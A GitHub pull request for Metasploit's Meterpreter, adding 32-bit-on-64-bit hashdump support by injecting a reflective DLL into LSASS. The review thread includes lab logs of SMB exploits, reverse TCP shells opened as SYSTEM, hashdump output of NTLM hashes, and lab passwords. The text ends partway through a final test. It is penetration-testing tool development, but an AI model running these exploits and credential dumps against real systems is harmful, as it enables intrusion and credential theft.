Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

WOW64 Support for hashdump #631

Merged
merged 4 commits into from
Apr 27, 2023
Merged

WOW64 Support for hashdump #631

merged 4 commits into from
Apr 27, 2023

Conversation

zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner commented Apr 6, 2023
edited
Loading

Overview

This closes rapid7/metasploit-framework#17776 by adding hashdump support to 32-bit Meterpreters running on 64-bit hosts.

Old Approach

The old approach was to use native code compiled into Meterpreter that it would carve out and then copy into an executable segment in the target LSASS process. This was the main source of the limitation because the architecture of LSASS has to match Meterpreter. This meant dump_sam was one giant function that couldn't use any external functions so they all had to be passed in through the FUNCTIONARGS struct and be resolved by the injector (meterpreter).

New Approach

The new approach breaks dump_sam into it's own Visual Studio solution file. This allows DLLs for both 32-bit and 64-bit variants to be built. Next the 32-bit Meterpreter embeds both 32-bit and 64-bit variants within it's priv extension so it can inject the correct one at run time. The 64-bit Meterpreter will only ever run on systems with a 64-bit version of LSASS so it only embeds the 64-bit version of the DLL. The DLLs are embedded as resources so they don't need to be sent as an argument which retains backwards compatibility because there are no changes necessary in the Metasploit Framework. I tried to make these DLLs as small as possible. In the main MSVC release builds (the ones we ship to users) the export is by ordinal using the new pattern, they are dynamically linked to reduce the size, and the MSVCRT isn't included.

ReflectiveFreeAndExitThread

Reflective DLLs can not take advantage of FreeLibraryAndExitThread like traditionally loaded DLLs can. This new method allows an RDLL to free it's memory and exit cleanly. It's self contained in it's own files for future reuse, and perhaps it should be moved into the ReflectiveDLLInjection repo. The problem it solves is that the memory in which the RDLL is running was VirtuallAlloc'ed by the loader and can't be simply VirtualFree'ed without running into a race condition of the executable code effectively freeing itself. This approach can be broken down into the following steps:

  1. A new, suspended thread is created to invoke APCs (referred to as the cleanup thread). This thread uses ExitThread as it's starting point to ensure it exits cleanly once it has executed all of the APCs that have been queued to it.
  2. A handle to the current/RDLL thread is opened to be passed to the cleanup thread.
  3. NtQueueApcThread is used to add a call to WaitForSingleObjectEx. NtQueueApcThread is used instead of QueueUserAPC because it allows the target function to be called with three arguments instead of one. The WaitForSingleObjectEx call is used to ensure the cleanup thread waits on the current thread before executing the next APC. The current thread can take its time before exiting.
  4. QueueUserAPC is used to have the cleanup thread close the handle to the current thread, ensuring there is no handle leak.
  5. NtQueueApcThread is used again to queue a call to VirtualFree to free the memory previously allocated by the ReflectiveLoader. This step is the whole point of the process.
  6. The cleanup thread is resumed, causing it to execute it's APCs before invoking it's start routine.
  7. The current thread closes the handle to the cleanup thread and exits itself, causing the WaitForSingleObjectEx call in step 3 to return and the remaining queued function to run in order.

You can validate that everything works correctly by seeing that the process does not crash and that the memory is freed and handles are closed. Process Hacker is a good tool for this and you can log the freed values in the debug output. This has been validated on Windows XP and Server 2019.

Additional changes

  • Updated inject_dll signature. It had a few unnecessary limitations including:
    • The argument was a null-terminated string instead of an arbitrarily sized buffer (fixed by adding a size argument)
    • The argument that was provided had to be a local buffer and not a remote pointer (fixed by checking the new size argument)
    • The target process architecture must match the current Meterpreter architecture (fixed by adding a destination architecture argument like the other inject methods have)
  • Event lock names are now randomized
  • Switched get_lsass_handle from using GetModuleBaseName to use GetProcessImageFileName so it would work in WOW64 environments

Testing

  • Test all of the MSVC builds to ensure they're compiling correct
  • Test all of the docker builds to ensure they are also compiling correct (run make docker from c/meterpreter)
  • Test that hashdump works on
  • 32-bit systems with a 32-bit Meterpreter
  • 64-bit systems with a 64-bit Meterpreter
  • 64-bit systems with a 32-bit Meterpreter

If you test the MinGW builds, note that the session will crash on initialization unless AutoLoadStdapi is disabled or the changes #630 are present.

Demo

Shows everything working as expected in the following scenarios:

  • x86 working on Windows XP (showing we still support the oldest version)
  • WOW64 working on Server 2019 (this is the new one)
  • x64 working on Server 2019 (showing this still works
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.16:445 - Automatically detecting the target...
[*] 192.168.159.16:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.16:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.16:445 - Attempting to trigger the vulnerability...
[*] Sending stage (242254 bytes) to 192.168.159.16
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.16:1036) at 2023-04-06 17:40:53 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SMCINTYR-7D7507
OS              : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cde0d26ae931b73b59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d998557dad6cc5ee0611a3ea94445b99:1008c1045548a33f06d2848c53e73d3e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:73fc8537a3d4ac0b57ec75736d809988:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.16 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/psexec 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[*] 192.168.159.96:445 - Selecting PowerShell target
[*] 192.168.159.96:445 - Executing the payload...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (186950 bytes) to 192.168.159.96
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.96:56672) at 2023-04-06 17:40:10 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KHPRSGSRF30
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae932b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1681c4fd1448319a8c04f:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:492392ba299df55a3d78fb3004a81b96:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4085fbdccb5f3c0b34f112bb7a57fe3d:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.96 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[*] 192.168.159.96:445 - Selecting PowerShell target
[*] 192.168.159.96:445 - Executing the payload...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
[*] Sending stage (222278 bytes) to 192.168.159.96
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.96:56676) at 2023-04-06 17:40:31 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KHPRSGSRF30
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae932b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1681c4fd1448319a8c04f:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:492392ba299df55a3d78fb3004a81b96:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4085fbdccb5f3c0b34f112bb7a57fe3d:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.96 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) >

@jmartin-tech
Copy link
Contributor

Automation compile errors:

16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: The command "msbuild -t:Build -p:Configuration=Release;Platform=Win32 ..\dump_sam\dump_sam.sln [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15 C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: msbuild -t:Build -p:Configuration=Release;Platform=x64 ..\dump_sam\dump_sam.sln [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15 C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: :VCEnd" exited with code 1. [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15 
16:50:15     15 Warning(s)
16:50:15     5 Error(s)

@zeroSteiner
Copy link
Contributor Author

@jmartin-r7 I'm confused. It looks like it's complaining that the v141_xp platform toolset can but found but that's what the Meterpreter extensions are configured to use which is why I selected that value. Is there some special way to access that on the build system?

Here's the config for the priv extension I based it on showing it's using v141_xp as the Platform toolset. It's the same value for the r7_release, Release and Debug configurations.

image

@zeroSteiner zeroSteiner mentioned this pull request Apr 7, 2023
Open
@jmartin-tech
Copy link
Contributor

jmartin-tech commented Apr 7, 2023
edited
Loading

Automation uses v120_xp on VisualStudio Express 2013 Community. As noted in the README for the c/meterperter build you can force newer VisualStudio versions back to that toolset with an option on compile.

@adfoster-r7
Copy link
Contributor

adfoster-r7 commented Apr 21, 2023
edited
Loading

Testing output - windows 7 failing and windows 10 passing

Windows 7 - 32 bit 🔴

Looks like this breaks opening up a normal session against a Windows 7 host with default psexec 32 bit payload - windows/meterpreter/reverse_tcp

Before:

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.135 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.135:445 - Connecting to the server...
[*] 192.168.123.135:445 - Authenticating to 192.168.123.135:445 as user 'alan'...
[*] 192.168.123.135:445 - Selecting PowerShell target
[*] 192.168.123.135:445 - Executing the payload...
[+] 192.168.123.135:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.135
[*] Meterpreter session 8 opened (192.168.123.1:4444 -> 192.168.123.135:49170) at 2023-04-21 11:39:15 +0100

meterpreter >

After building Meterpreter and copying the custom dll across:

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.135 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.135:445 - Connecting to the server...
[*] 192.168.123.135:445 - Authenticating to 192.168.123.135:445 as user 'alan'...
[*] 192.168.123.135:445 - Selecting PowerShell target
[*] 192.168.123.135:445 - Executing the payload...
[+] 192.168.123.135:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (541267 bytes) to 192.168.123.135
[*] 192.168.123.135 - Meterpreter session 7 closed.  Reason: Died

From the TLV logging it dies after the stdapi dll load:

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=10 command=core_enumextcmd>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="06900196490826778254789703096614">
  #<Rex::Post::Meterpreter::Tlv type=UINT            meta=INT        value=2000>
  #<Rex::Post::Meterpreter::Tlv type=LENGTH          meta=INT        value=1000>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Response        tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=10 command=core_enumextcmd>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="06900196490826778254789703096614">
  #<Rex::Post::Meterpreter::Tlv type=RESULT          meta=INT        value=0>
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="}r\x18s\x7Fm\xDF&8\x889\x89\\\xCAP\xAF">
]>

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=12 command=core_loadlib>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="11047606585979534701349857621491">
  #<Rex::Post::Meterpreter::Tlv type=DATA            meta=RAW        value="MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xF ...">
  #<Rex::Post::Meterpreter::Tlv type=LIBRARY_PATH    meta=STRING     value="ext268864.x86.dll">
  #<Rex::Post::Meterpreter::Tlv type=FLAGS           meta=INT        value=2>
  #<Rex::Post::Meterpreter::Tlv type=TARGET_PATH     meta=STRING     value="/tmp/ext268864.x86.dll">
]>
[*] 192.168.123.135 - Meterpreter session 10 closed.  Reason: Died

Windows 7 64 bit 🟢

The windows/x64/meterpreter/reverse_tcp payload works:


msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.135 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.135:445 - Connecting to the server...
[*] 192.168.123.135:445 - Authenticating to 192.168.123.135:445 as user 'alan'...
[*] 192.168.123.135:445 - Selecting PowerShell target
[*] 192.168.123.135:445 - Executing the payload...
[+] 192.168.123.135:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (223814 bytes) to 192.168.123.135
[*] Meterpreter session 13 opened (192.168.123.1:4444 -> 192.168.123.135:49175) at 2023-04-21 11:43:57 +0100

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:....:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:...:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:...:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:...:::
meterpreter >

Windows 10 32 🔴

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.164 username=admin password=password123
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.164:445 - Connecting to the server...
[*] 192.168.123.164:445 - Authenticating to 192.168.123.164:445 as user 'admin'...
[*] 192.168.123.164:445 - Selecting PowerShell target
[*] 192.168.123.164:445 - Executing the payload...
[+] 192.168.123.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (541267 bytes) to 192.168.123.164
[*] 192.168.123.164 - Meterpreter session 14 closed.  Reason: Died

Windows 10 64 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.164 username=admin password=password123
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.164:445 - Connecting to the server...
[*] 192.168.123.164:445 - Authenticating to 192.168.123.164:445 as user 'admin'...
[*] 192.168.123.164:445 - Selecting PowerShell target
[*] 192.168.123.164:445 - Executing the payload...
[+] 192.168.123.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (223814 bytes) to 192.168.123.164
[*] Meterpreter session 15 opened (192.168.123.1:4444 -> 192.168.123.164:63076) at 2023-04-21 11:45:54 +0100

meterpreter > hashdump
admin:1005:aad3b435b51404eeaad3b435b51404ee....etc...etc..
meterpreter >

Edit: Verified the above as PEBKAC, ignore

@zeroSteiner
Copy link
Contributor Author

@adfoster-r7 did you build with MinGW or MSVC?

@adfoster-r7
Copy link
Contributor

adfoster-r7 commented Apr 21, 2023
edited
Loading

MSVC - I'm just looking into this a bit more now as potentially it's pebkac. I did rebase this branch locally against the latest master before testing which might have caused the problem for me as well

@adfoster-r7
Copy link
Contributor

I've verified generating a stageless 32 bit payload works now:

msf6 payload(windows/meterpreter_reverse_tcp) > to_handler
WARNING: Local file /Users/user/Documents/code/metasploit-framework/data/meterpreter/metsrv.x86.debug.dll is being used
[*] Payload Handler Started as Job 5
msf6 payload(windows/meterpreter_reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.123.1:4444 
WARNING: Local file /Users/user/Documents/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.debug.dll is being used
WARNING: Local file /Users/user/Documents/code/metasploit-framework/data/meterpreter/ext_server_priv.x86.debug.dll is being used
[*] Meterpreter session 22 opened (192.168.123.1:4444 -> 192.168.123.135:49395) at 2023-04-21 13:51:36 +0100

msf6 payload(windows/meterpreter_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  22        meterpreter x86/windows  WIN-4PK8J9RF052\alan @ WIN-4PK8J9RF052  192.168.123.1:4444 -> 192.168.123.135:49395 (192.168.123.135)

msf6 payload(windows/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 22...

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:d9b73b76001fb6431956ca5aa9714672:::
meterpreter > exit

But psexec still fails; so I believe it's an issue with staged payloads, and isn't pebkac 🤞

@zeroSteiner
Copy link
Contributor Author

zeroSteiner commented Apr 21, 2023
edited
Loading

I can't reproduce the problem. It looks like you're looking at a 32-bit Meterpreter (built with MSVC) running on a 64-bit Windows 10 host right? Did you also build and load new versions of metsrv, stdapi and priv? It's possible that if one of those was not built using the new code, it'd cause a failure on load maybe. The only metsrv and stdapi changes made though were the injection API updates.

Testing Output 
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.87:445 - Connecting to the server...
[*] 192.168.159.87:445 - Authenticating to 192.168.159.87:445 as user 'smcintyre'...
[*] 192.168.159.87:445 - Selecting PowerShell target
[*] 192.168.159.87:445 - Executing the payload...
[+] 192.168.159.87:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (186950 bytes) to 192.168.159.87
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.87:49989) at 2023-04-21 09:00:52 -0400

meterpreter > sysinfo
Computer        : DESKTOP-81CEH16
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
aliddle:1001:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ff05a994a516bd07dc60a6b113636940:::
meterpreter >

I rebased to pull in the change for fixing stdapi built with MinGW and the build is failing again.

@jmartin-tech
Copy link
Contributor

@msjenkins-r7 test this please.

@adfoster-r7 adfoster-r7 mentioned this pull request Apr 25, 2023
Merged
@zeroSteiner
Add the dump_sam project
d114f5e 
This is going to build a stand-alone RDLL that can be injected into
LSASS for hashdump.

The samsrv.dll functions still need to be resolved because they're not
exported but the rest can be used normally thanks to the RDLL loader.
Defined 32-bit and 64-bit structures that are compatible with MSVC and
MinGW. DLLs are dynamically linked for size and the Visual-C Runtime is
not used.

The reflectively loaded DLL is freed once the operation has completed.
@zeroSteiner
Update the signature for inject_dll
d64c312 
Need to be able to pass things that are not strings
@zeroSteiner
Use dump_sam for WOW64 support
1c4f2df 
Switch to using the dump_sam RDLL for x86, WOW64 and x64 hashdump
support.
@smcintyre-r7
Copy link
Contributor

@msjenkins-r7 test this please.

@adfoster-r7
Copy link
Contributor

adfoster-r7 commented Apr 27, 2023
edited
Loading

The previous Windows 7 / 10 configuration passed; and mingw output below. Separate issue raised to fix docker mingw builds from a mac host created - #641

Mingw Windows 7 32 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.142 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.142:445 - Connecting to the server...
[*] 192.168.123.142:445 - Authenticating to 192.168.123.142:445 as user 'alan'...
[*] 192.168.123.142:445 - Selecting PowerShell target
[*] 192.168.123.142:445 - Executing the payload...
[+] 192.168.123.142:445 - Service start timed out, OK if running a command or non-service executable...
hash[*] Sending stage (488696 bytes) to 192.168.123.142
dump[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.142:49161) at 2023-04-27 16:38:58 +0100

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:d9b73b76001fb6431956ca5aa9714672:::

Mingw Windows 7 64 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.145 username=alan password=a payload=windows/x64/meterpreter/reverse_tcp
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.145:445 - Connecting to the server...
[*] 192.168.123.145:445 - Authenticating to 192.168.123.145:445 as user 'alan'...
[*] 192.168.123.145:445 - Selecting PowerShell target
[*] 192.168.123.145:445 - Executing the payload...
[+] 192.168.123.145:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /Users/adfoster/Documents/code/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (554937 bytes) to 192.168.123.145
WARNING: Local file /Users/adfoster/Documents/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /Users/adfoster/Documents/code/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.145:49178) at 2023-04-27 17:28:35 +0100

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:d9b73b76001fb6431956ca5aa9714672:::

Mingw Windows 10 32 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.141 username=admin password=password123
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.141:445 - Connecting to the server...
[*] 192.168.123.141:445 - Authenticating to 192.168.123.141:445 as user 'admin'...
[*] 192.168.123.141:445 - Selecting PowerShell target
[*] 192.168.123.141:445 - Executing the payload...
[+] 192.168.123.141:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (488696 bytes) to 192.168.123.141
[*] Meterpreter session 13 opened (192.168.123.1:4444 -> 192.168.123.141:62014) at 2023-04-27 17:40:44 +0100

meterpreter > hashdump
admin:1005:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1006:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Alan David Foster:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
basic_user:1007:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
foo:1003:aad3b435b51404eeaad3b435b51404ee:ac8e657f83df82beea5d43bdaf7800cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test_user:1002:aad3b435b51404eeaad3b435b51404ee:066ddfd4ef0e9cd7c256fe77191ef43c:::
user:1004:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:19ce80797959fdfb522f09643d79aa26:::

Mingw Windows 10 64 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.141 username=admin password=password123 payload=windows/x64/meterpreter/reverse_tcp
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.141:445 - Connecting to the server...
[*] 192.168.123.141:445 - Authenticating to 192.168.123.141:445 as user 'admin'...
[*] 192.168.123.141:445 - Selecting PowerShell target
[*] 192.168.123.141:445 - Executing the payload...
[+] 192.168.123.141:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (554937 bytes) to 192.168.123.141
[*] Meterpreter session 14 opened (192.168.123.1:4444 -> 192.168.123.141:62016) at 2023-04-27 17:41:19 +0100

meterpreter > hashdump
